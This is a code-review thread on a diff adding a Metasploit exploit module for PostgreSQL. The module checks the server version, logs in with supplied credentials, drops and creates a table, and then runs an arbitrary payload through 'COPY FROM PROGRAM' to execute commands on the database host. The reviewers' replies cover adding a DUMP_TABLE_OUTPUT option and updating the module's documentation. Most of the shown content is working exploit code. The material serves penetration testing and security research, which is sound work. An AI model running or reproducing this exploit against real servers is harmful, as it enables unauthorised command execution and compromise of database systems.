modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb

```diff
@@ -0,0 +1,247 @@
+  # @return [String] tablename for table to use with command execution
+  def tablename
+    datastore['TABLENAME']
+  end
+
+  def check
+    vuln_version? ? CheckCode::Appears : CheckCode::Safe
+  end
+
+  def vuln_version?
+    version = postgres_fingerprint
+    return false unless version[:auth]
+    vprint_status version[:auth].to_s
+    version_full = version[:auth].to_s.scan(/^PostgreSQL ([\d\.]+)/).flatten.first
+    if Gem::Version.new(version_full) >= Gem::Version.new('9.3')
+      return true
+    else
+      return false
+    end
+  end
+
+  def login_success?
+    status = do_login(username, password, database)
+    case status
+    when :noauth
+      print_error "#{peer} - Authentication failed"
+      return false
+    when :noconn
+      print_error "#{peer} - Connection failed"
+      return false
+    else
+      print_status "#{peer} - #{status}"
+      return true
+    end
+  end
+
+  def execute_payload
+    # Drop table if it exists
+    query = "DROP TABLE IF EXISTS #{tablename};"
+    drop_query = postgres_query(query)
+    case drop_query.keys[0]
+    when :conn_error
+      print_error "#{peer} - Connection error"
+      return false
+    when :sql_error
+      print_warning "#{peer} - Unable to execute query: #{query}"
+      return false
+    when :complete
+      print_good "#{peer} - #{tablename} dropped successfully"
+    else
+      print_error "#{peer} - Unknown"
+      return false
+    end
+
+    # Create Table
+    query = "CREATE TABLE #{tablename}(filename text);"
+    create_query = postgres_query(query)
+    case create_query.keys[0]
+    when :conn_error
+      print_error "#{peer} - Connection error"
+      return false
+    when :sql_error
+      print_warning "#{peer} - Unable to execute query: #{query}"
+      return false
+    when :complete
+      print_good "#{peer} - #{tablename} created successfully"
+    else
+      print_error "#{peer} - Unknown"
+      return false
+    end
+
+    # Copy Command into Table
+    cmd_filtered = payload.encoded.gsub("'", "''")
+    query = "COPY #{tablename} FROM PROGRAM '#{cmd_filtered}';"
+    copy_query = postgres_query(query)
+    case copy_query.keys[0]
+    when :conn_error
+      print_error "#{peer} - Connection error"
+      return false
+    when :sql_error
+      print_warning "#{peer} - Unable to execute query: #{query}"
+      if copy_query[:sql_error] =~ /must be superuser to COPY to or from an external program/
+        print_error 'Insufficient permissions, User must be superuser or in pg_read_server_files group'
+        return false
+      end
+      print_warning "#{peer} - Unable to execute query: #{query}"
+      return false
+    when :complete
+      print_good "#{peer} - #{tablename} copied successfully(valid syntax/command)"
+    else
+      print_error "#{peer} - Unknown"
+      return false
+    end
+
+    # Select output from table for debugging
+    #query = "SELECT * FROM #{tablename};"
```

Comment:
This block of code is useful and should be uncommented. You can make it optional if you desire.

Reply:
Example:

https://github.com/rapid7/metasploit-framework/blob/8fcc36b6a09e754f07568538d14513bda066d856/modules/exploits/unix/webapp/drupal_restws_unserialize.rb#L81

https://github.com/rapid7/metasploit-framework/blob/8fcc36b6a09e754f07568538d14513bda066d856/modules/exploits/unix/webapp/drupal_restws_unserialize.rb#L151-L155

https://github.com/rapid7/metasploit-framework/blob/8fcc36b6a09e754f07568538d14513bda066d856/modules/exploits/unix/webapp/drupal_restws_unserialize.rb#L197

Reply:
I've added a new option 'DUMP_TABLE_OUTPUT', and wrapped the commented code in an if statement for is it is true (default false).

Reply:
Please add `DUMP_TABLE_OUTPUT` to module documentation.

Reply:
Done, and removed the old COMMAND documentation